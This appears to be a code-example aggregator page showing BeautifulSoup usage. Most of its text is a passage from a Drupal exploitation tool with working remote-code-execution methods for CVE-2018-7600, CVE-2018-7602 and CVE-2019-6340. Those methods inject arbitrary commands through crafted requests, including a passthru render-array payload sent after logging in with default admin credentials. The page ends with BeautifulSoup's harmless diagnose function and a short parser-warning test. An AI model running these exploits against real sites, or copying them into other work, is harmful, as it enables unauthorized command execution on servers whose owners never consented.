                self.vul_info["vul_urls"] = self.payload
                self.vul_info["prt_info"] = "[rce] [cmd:" + cmd + "]"
            verify.scan_print(self.vul_info)
        except requests.exceptions.Timeout:
            verify.timeout_print(self.vul_info["prt_name"])
        except requests.exceptions.ConnectionError:
            verify.connection_print(self.vul_info["prt_name"])
        except Exception as error:
            verify.error_print(self.vul_info["prt_name"])
        self.threadLock.release()

    def cve_2018_7600_exp(self, cmd):
        vul_name = "Drupal: CVE-2018-7600"
        self.payload = self.payload_cve_2018_7600.replace("RECOMMAND", cmd)
        self.path = "/user/register?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax"
        try:
            request = requests.post(self.url + self.path,
                                    data=self.payload,
                                    headers=self.headers,
                                    timeout=self.timeout,
                                    verify=False)
            self.raw_data = dump.dump_all(request).decode('utf-8', 'ignore')
            verify.exploit_print(request.text, self.raw_data)
        except requests.exceptions.Timeout:
            verify.timeout_print(vul_name)
        except requests.exceptions.ConnectionError:
            verify.connection_print(vul_name)
        except Exception:
            verify.error_print(vul_name)

    def cve_2018_7602_exp(self, cmd):
        vul_name = "Drupal: CVE-2018-7602"
        DRUPAL_U = "admin"
        DRUPAL_P = "admin"
        try:
            self.session = requests.Session()
            self.get_params = {'q': 'user/login'}
            self.post_params = {
                'form_id': 'user_login',
                'name': DRUPAL_U,
                'pass': DRUPAL_P,
                'op': 'Log in'
            }
            self.session.post(self.url,
                              params=self.get_params,
                              data=self.post_params,
                              headers=self.headers,
                              timeout=self.timeout,
                              verify=False)
            self.get_params = {'q': 'user'}
            self.r = self.session.get(self.url,
                                      params=self.get_params,
                                      headers=self.headers,
                                      timeout=self.timeout,
                                      verify=False)
            self.soup = BeautifulSoup(self.r.text, "html.parser")
            self.user_id = self.soup.find('meta', {
                'property': 'foaf:name'
            }).get('about')
            if "?q=" in self.user_id:
                self.user_id = self.user_id.split("=")[1]
            self.get_params = {'q': self.user_id + '/cancel'}
            self.r = self.session.get(self.url,
                                      params=self.get_params,
                                      headers=self.headers,
                                      timeout=self.timeout,
                                      verify=False)
            self.soup = BeautifulSoup(self.r.text, "html.parser")
            self.form = self.soup.find('form',
                                       {'id': 'user-cancel-confirm-form'})
            self.form_token = self.form.find('input', {
                'name': 'form_token'
            }).get('value')
            self.get_params = {
                'q':
                self.user_id + '/cancel',
                'destination':
                self.user_id +
                '/cancel?q[%23post_render][]=passthru&q[%23type]=markup&q[%23markup]='
                + cmd
            }
            self.post_params = {
                'form_id': 'user_cancel_confirm_form',
                'form_token': self.form_token,
                '_triggering_element_name': 'form_id',
                'op': 'Cancel account'
            }
            self.r = self.session.post(self.url,
                                       params=self.get_params,
                                       data=self.post_params,
                                       headers=self.headers,
                                       timeout=self.timeout,
                                       verify=False)
            self.soup = BeautifulSoup(self.r.text, "html.parser")
            self.form = self.soup.find('form',
                                       {'id': 'user-cancel-confirm-form'})
            self.form_build_id = self.form.find('input', {
                'name': 'form_build_id'
            }).get('value')
            self.get_params = {
                'q':
                'file/ajax/actions/cancel/#options/path/' + self.form_build_id
            }
            self.post_params = {'form_build_id': self.form_build_id}
            self.r = self.session.post(self.url,
                                       params=self.get_params,
                                       data=self.post_params,
                                       headers=self.headers,
                                       timeout=self.timeout,
                                       verify=False)
            self.raw_data = dump.dump_all(self.r).decode('utf-8', 'ignore')
            verify.exploit_print(self.r.text, self.raw_data)
        except requests.exceptions.Timeout:
            verify.timeout_print(vul_name)
        except requests.exceptions.ConnectionError:
            verify.connection_print(vul_name)
        except Exception:
            verify.error_print(vul_name)

    def cve_2019_6340_exp(self, cmd):
        vul_name = "Drupal: CVE-2019-6340"
        self.path = "/node/?_format=hal_json"
        self.cmd_len = len(cmd)
        self.payload = self.payload_cve_2019_6340 % (self.cmd_len, cmd,
                                                     self.url)
        self.headers = {
            'User-Agent': self.ua,
            'Connection': "close",
            'Content-Type': "application/hal+json",
            'Accept': "*/*",
            'Cache-Control': "no-cache"
        }
        try:
            request = requests.post(self.url + self.path,
                                    data=self.payload,
                                    headers=self.headers,
                                    timeout=self.timeout,
                                    verify=False)
            self.raw_data = dump.dump_all(request).decode('utf-8', 'ignore')
            verify.exploit_print(request.text, self.raw_data)
        except requests.exceptions.Timeout:
            verify.timeout_print(vul_name)
        except requests.exceptions.ConnectionError:
            verify.connection_print(vul_name)
        except Exception:
            verify.error_print(vul_name)
Example #18
def diagnose(data):
    """Diagnostic suite for isolating common problems.

    :param data: A string containing markup that needs to be explained.
    :return: None; diagnostics are printed to standard output.
    """
    print("Diagnostic running on Beautiful Soup %s" % __version__)
    print("Python version %s" % sys.version)

    basic_parsers = ["html.parser", "html5lib", "lxml"]
    for name in list(basic_parsers):  # iterate over a copy; the list is mutated below
        for builder in builder_registry.builders:
            if name in builder.features:
                break
        else:
            basic_parsers.remove(name)
            print((
                "I noticed that %s is not installed. Installing it may help." %
                name))

    if 'lxml' in basic_parsers:
        basic_parsers.append("lxml-xml")
        try:
            from lxml import etree
            print("Found lxml version %s" %
                  ".".join(map(str, etree.LXML_VERSION)))
        except ImportError as e:
            print("lxml is not installed or couldn't be imported.")

    if 'html5lib' in basic_parsers:
        try:
            from thirdparty import html5lib
            print("Found html5lib version %s" % html5lib.__version__)
        except ImportError as e:
            print("html5lib is not installed or couldn't be imported.")

    if hasattr(data, 'read'):
        data = data.read()
    elif data.startswith("http:") or data.startswith("https:"):
        print('"%s" looks like a URL. Beautiful Soup is not an HTTP client.' %
              data)
        print(
            "You need to use some other library to get the document behind the URL, and feed that document to Beautiful Soup."
        )
        return
    else:
        try:
            if os.path.exists(data):
                print(
                    '"%s" looks like a filename. Reading data from the file.' %
                    data)
                with open(data) as fp:
                    data = fp.read()
        except ValueError:
            # This can happen on some platforms when the 'filename' is
            # too long. Assume it's data and not a filename.
            pass
        print()

    for parser in basic_parsers:
        print("Trying to parse your markup with %s" % parser)
        success = False
        try:
            soup = BeautifulSoup(data, features=parser)
            success = True
        except Exception as e:
            print("%s could not parse the markup." % parser)
            traceback.print_exc()
        if success:
            print("Here's what %s did with the markup:" % parser)
            print(soup.prettify())

        print("-" * 80)
Example #19
 def test_no_warning_if_explicit_parser_specified(self):
     with warnings.catch_warnings(record=True) as w:
         soup = BeautifulSoup("<a><b></b></a>", "html.parser")
     self.assertEqual([], w)